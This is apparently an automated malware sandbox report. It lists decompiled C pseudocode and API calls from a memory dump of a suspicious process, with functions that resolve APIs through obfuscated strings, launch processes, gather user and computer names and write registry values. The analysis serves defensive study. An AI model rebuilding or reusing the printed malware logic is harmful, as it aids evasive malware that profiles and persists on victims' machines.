                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 05fed423fcdffe5501cf0e624ed28682413b4d87e0ae50ce9c788efa133d21cc
                                                          • Instruction ID: af98483bf63ec2c824634f8327d375d9dfed80d4bdbbd47392641a0b0da399c5
                                                          • Opcode Fuzzy Hash: 05fed423fcdffe5501cf0e624ed28682413b4d87e0ae50ce9c788efa133d21cc
                                                          • Instruction Fuzzy Hash: 36412876D00219FBDF11AFA4CC48D9E7BB9EF44318F254161EE04A7220DB35EA50DB95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E04958EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E0495592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E0495A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x495d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x495d2a8; // 0x47a5a8
                                                          					_t18 = _t47 + 0x495e3e6; // 0x73797325
                                                          					_t68 = E04953C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x495d2a8; // 0x47a5a8
                                                          						_t19 = _t50 + 0x495e747; // 0x4dd8cef
                                                          						_t20 = _t50 + 0x495e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E0495A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E0495A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x495d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E0495A734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0495592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04958EBD,?,00000001,?,?,00000000,00000000), ref: 04955952
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04955974
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0495598A
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049559A0
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049559B6
                                                            • Part of subcall function 0495592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049559CC
                                                          • memset.NTDLL ref: 04958F0B
                                                            • Part of subcall function 04953C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04958F24,73797325), ref: 04953C59
                                                            • Part of subcall function 04953C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04953C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04DD8CEF,73797325), ref: 04958F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04958F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04958FB0
                                                            • Part of subcall function 0495A62D: GetProcAddress.KERNEL32(36776F57,0495A2D4), ref: 0495A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04958F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04958F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04958F96
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 7806b855be146b0bb14aabdb86ed68f344998622d4c6b31c7c529707839b598b
                                                          • Instruction ID: 83e182caecf7d820dd2a7b37fa20c2a233a6637e7fc682479e4333065fb25663
                                                          • Opcode Fuzzy Hash: 7806b855be146b0bb14aabdb86ed68f344998622d4c6b31c7c529707839b598b
                                                          • Instruction Fuzzy Hash: 80310EB2904208BFEB11EFA4DC88D9EBFBDEB48354F204575EA05A7120D775AE54CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E04951BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x495d2a8; // 0x47a5a8
                                                          				_t1 = _t9 + 0x495e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E0495173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E0495A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E049564EF(_t34, _t41, _a8);
                                                          						E0495A734(_t41);
                                                          						_t42 = E04956467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E0495A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E049517E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E0495A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E0495A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0495173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04951BD0,253D7325,00000000,00000000,7742C740,?,?,049520C2,?), ref: 049517A4
                                                            • Part of subcall function 0495173D: sprintf.NTDLL ref: 049517C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                          • lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • strcpy.NTDLL ref: 04951C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 049564EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04951C1A,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04956506
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                            • Part of subcall function 04956467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04951C34,00000000,?,?,049520C2,?,04DD95B0), ref: 04956471
                                                            • Part of subcall function 04956467: _snprintf.NTDLL ref: 049564CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 1b5832e1b3d69bb2471d6add440ec7c409760aa3c059505552406e7ba261f45f
                                                          • Instruction ID: 3cfd6b1d4e504cd175d7eb0dc6de44325210f295531c4f113ce18930418b5e46
                                                          • Opcode Fuzzy Hash: 1b5832e1b3d69bb2471d6add440ec7c409760aa3c059505552406e7ba261f45f
                                                          • Instruction Fuzzy Hash: 6611E337D01224679B12FBB49C84C6E3AAD8EC56683364236FE0497120DF38EE0287A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 049568EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 049568FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04956911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04956993
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: d7bad60988095f063a8a76546b884c0cae64da4f921501404009179e59a9d4b9
                                                          • Instruction ID: 8dcc4f6a5223467b4839195a7fee3cf55bac19fe95feb4e820510ee72b543af5
                                                          • Opcode Fuzzy Hash: d7bad60988095f063a8a76546b884c0cae64da4f921501404009179e59a9d4b9
                                                          • Instruction Fuzzy Hash: DC415E36900609AFDF01DFB8D854A9EBBBAEF89310F644425ED14EB220DA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0495592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E0495A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x495d2a8; // 0x47a5a8
                                                          					_t1 = _t23 + 0x495e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x495d2a8; // 0x47a5a8
                                                          					_t2 = _t26 + 0x495e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E0495A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x495d2a8; // 0x47a5a8
                                                          						_t5 = _t30 + 0x495e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x495d2a8; // 0x47a5a8
                                                          							_t7 = _t33 + 0x495e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x495d2a8; // 0x47a5a8
                                                          								_t9 = _t36 + 0x495e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x495d2a8; // 0x47a5a8
                                                          									_t11 = _t39 + 0x495e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E04956604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04958EBD,?,00000001,?,?,00000000,00000000), ref: 04955952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04955974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0495598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049559A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049559B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049559CC
                                                            • Part of subcall function 04956604: memset.NTDLL ref: 04956683
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: c9471515214aa249109267fd2ab57b98a9dce64b9b55e834e0a914c902f98439
                                                          • Instruction ID: 37fc8fade8e1b3e07c956dee4af365aa6ffbcc30f56f86bc41cbc75dd15c78c2
                                                          • Opcode Fuzzy Hash: c9471515214aa249109267fd2ab57b98a9dce64b9b55e834e0a914c902f98439
                                                          • Instruction Fuzzy Hash: B32182B0500706AFEB11DF69D854D56BBECEF443147218236E909C7621E778FA05CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0495853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x495d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E04959070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E04956E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E0495A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x495d278; // 0x4dd9a98
                                                          					_t16 = _t64 + 0xc; // 0x4dd9b66
                                                          					_t65 = E04959070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d0495c0
                                                          						if(E049522F1(_t97,  *_t33, _t91, _a8,  *0x495d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x495d2a8; // 0x47a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x495ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x495e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E04956C38(_t69,  *0x495d334,  *0x495d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x495d2a8; // 0x47a5a8
                                                          									_t44 = _t71 + 0x495e846; // 0x74666f53
                                                          									_t73 = E04959070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d0495c0
                                                          										E04955D7D( *_t47, _t91, _a8,  *0x495d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d0495c0
                                                          										E04955D7D( *_t49, _t91, _t99,  *0x495d330, _a16);
                                                          										E0495A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d0495c0
                                                          									E04955D7D( *_t40, _t91, _a8,  *0x495d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d0495c0
                                                          									E04955D7D( *_t43, _t91, _a8,  *0x495d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E0495A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d0495c0
                                                          					_t81 = E04958BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d0495c0
                                                          							E049522F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E0495A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E0495A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E0495A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x495d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(04953741,0000005F,00000000,00000000,00000104), ref: 04958572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0495859F
                                                            • Part of subcall function 04959070: lstrlen.KERNEL32(?,00000000,04DD9A98,00000000,04958808,04DD9C76,?,?,?,?,?,63699BC3,00000005,0495D00C), ref: 04959077
                                                            • Part of subcall function 04959070: mbstowcs.NTDLL ref: 049590A0
                                                            • Part of subcall function 04959070: memset.NTDLL ref: 049590B2
                                                            • Part of subcall function 04955D7D: lstrlenW.KERNEL32(?,?,?,04958708,3D0495C0,80000002,04953741,0495A513,74666F53,4D4C4B48,0495A513,?,3D0495C0,80000002,04953741,?), ref: 04955DA2
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 049585C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 9c2b52f04ad4c06e904ebdc0c260f07d356d53bc12b48c5f13e60a4bf62b5c0f
                                                          • Instruction ID: 5f4be5462fcfb25547aee5440ecd2457508cc0b1b8bc8131450f3f6b59dba75a
                                                          • Opcode Fuzzy Hash: 9c2b52f04ad4c06e904ebdc0c260f07d356d53bc12b48c5f13e60a4bf62b5c0f
                                                          • Instruction Fuzzy Hash: FA51197650020AAFEF11EF60D944E9E7BBDEF84258F208634FE1596130D739EA25DB11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0495A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E0495A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E0495A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x4951fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04951FD2), ref: 0495A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04951FD2), ref: 0495A1C9
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04951FD2), ref: 0495A203
                                                          • GetComputerNameW.KERNEL32(04951FD2,?), ref: 0495A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04951FD2,00000000,04951FD4,00000000,00000000,?,?,04951FD2), ref: 0495A249
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 677ea6eb594b3974c94882016214576c0deb643ed15beba00ecc8f35f7bb1616
                                                          • Instruction ID: 2011d81e06058af69496f7b896c7aca2b7835b53174d3b58314d5e673a210b0d
                                                          • Opcode Fuzzy Hash: 677ea6eb594b3974c94882016214576c0deb643ed15beba00ecc8f35f7bb1616
                                                          • Instruction Fuzzy Hash: 2B21EC76A01208FFDB11DFE4D9859EEBBBCEF48304B2045AAE901E7250DB35AB44DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04953DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E04955AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E0495A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x495d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,049567B8,?,?,00000000,00000000), ref: 04953E23
                                                          • ResetEvent.KERNEL32(?), ref: 04953E28
                                                          • GetLastError.KERNEL32 ref: 04953E40
                                                          • GetLastError.KERNEL32(?,?,00000102,049567B8,?,?,00000000,00000000), ref: 04953E5B
                                                            • Part of subcall function 04955AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04953E08,?,?,?,?,00000102,049567B8,?,?,00000000), ref: 04955AFD
                                                            • Part of subcall function 04955AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04953E08,?,?,?,?,00000102,049567B8,?), ref: 04955B5B
                                                            • Part of subcall function 04955AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04955B6B
                                                          • SetEvent.KERNEL32(?), ref: 04953E4E
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
